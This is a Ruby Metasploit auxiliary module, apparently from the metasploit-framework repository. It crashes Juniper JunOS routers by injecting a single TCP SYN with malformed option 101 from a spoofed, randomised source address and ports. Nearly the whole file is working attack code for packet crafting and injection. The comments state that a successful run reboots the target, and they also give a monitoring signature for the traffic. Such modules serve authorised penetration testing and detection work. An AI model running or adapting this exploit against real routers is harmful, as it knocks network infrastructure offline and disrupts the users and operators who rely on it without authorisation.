GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/tcp/junos_tcp_opt.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
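# Auxiliary DoS module for the JunOS malformed-TCP-option issue described in
# the metadata below. It injects a single TCP SYN carrying TCP option kind 101
# (0x65) toward RHOST, with the source address and both ports randomised
# unless SHOST / SPORT / RPORT are set. The module declares
# CRASH_OS_RESTARTS stability, i.e. a successful run is expected to reboot the
# target; it is only appropriate where that outcome is authorised.
#
# From a monitoring perspective the injected traffic is distinctive: a SYN
# whose options field begins with kind 0x65, which is not a registered TCP
# option kind in normal traffic.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::Dos

  # Registers module metadata and the three optional override options.
  # FILTER, PCAPFILE and SNAPLEN (inherited from Msf::Exploit::Capture) are
  # deregistered; presumably because +run+ only injects a packet and never
  # reads from the capture handle, so capture-side settings have no effect.
  def initialize
    super(
      'Name' => 'Juniper JunOS Malformed TCP Option',
      'Description' => %q{
        This module exploits a denial of service vulnerability
        in Juniper Network's JunOS router operating system. By sending a TCP
        packet with TCP option 101 set, an attacker can cause an affected
        router to reboot.
      },
      'Author' => 'todb',
      'License' => MSF_LICENSE,
      'References' => [
        ['BID', '37670'],
        ['OSVDB', '61538'],
        ['URL', 'http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/']
      ],
      'Notes' => {
        'Stability' => [CRASH_OS_RESTARTS],
        'SideEffects' => [],
        'Reliability' => []
      }
    )

    register_options([
      OptInt.new('RPORT', [false, 'The destination port (defaults to random)']),
      OptInt.new('SPORT', [false, 'Source port (defaults to random)']),
      OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])
    ])

    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN')
  end

  # Destination port for the SYN.
  #
  # Falls back to a random port when RPORT is unset, non-numeric or 0
  # (+to_i+ maps nil and non-numeric strings to 0). NOTE: rand(0xffff)
  # yields 0..65534, so the random choice can be port 0.
  # @return [Integer]
  def rport
    configured = datastore['RPORT'].to_i
    configured.zero? ? rand(0xffff) : configured
  end

  # Source port for the SYN; same fallback rules as #rport.
  # @return [Integer]
  def sport
    configured = datastore['SPORT'].to_i
    configured.zero? ? rand(0xffff) : configured
  end

  # Source IPv4 address for the SYN.
  #
  # Uses SHOST when it is set to a non-empty value, otherwise a random IPv4
  # address (rand(0xffffffff) covers 0..0xfffffffe). The nil-or-empty check is
  # explicit because an empty string is truthy in Ruby and would otherwise be
  # handed to PacketFu verbatim.
  # @return [String]
  def shost
    configured = datastore['SHOST']
    return configured unless configured.nil? || configured.to_s.empty?

    IPAddr.new(rand(0xffffffff), Socket::AF_INET).to_s
  end

  # Opens the pcap handle, sends one crafted SYN to RHOST and closes the
  # handle again. close_pcap runs in an +ensure+ so that an exception raised
  # while building or injecting the packet cannot leak the handle opened by
  # open_pcap; open_pcap itself stays outside the block so a failed open is
  # not followed by a close.
  # @return [void]
  def run
    open_pcap
    begin
      pkt = build_syn_packet
      print_status("#{pkt.ip_daddr}:#{pkt.tcp_dport} Sending TCP Syn packet from #{pkt.ip_saddr}:#{pkt.tcp_sport}")
      capture_sendto(pkt, rhost)
    ensure
      close_pcap
    end
  end

  private

  # Builds the single SYN packet sent by #run: random-looking TTL and window,
  # addresses/ports from the accessors above, and a 4-byte options field of
  # kind 101 (0x65), length 2, NOP, EOL. Checksums and lengths are recomputed
  # by +recalc+ after all fields are set.
  # @return [PacketFu::TCPPacket]
  def build_syn_packet
    pkt = PacketFu::TCPPacket.new
    pkt.ip_daddr = rhost
    pkt.ip_saddr = shost
    pkt.ip_ttl = rand(128..255)
    pkt.tcp_sport = sport
    pkt.tcp_dport = rport
    pkt.tcp_flags.syn = 1
    pkt.tcp_win = rand(1..4096)
    pkt.tcp_opts = "e\x02\x01\x00" # Opt 101 (0x65), len 2, nop, eol
    pkt.recalc
    pkt
  end
end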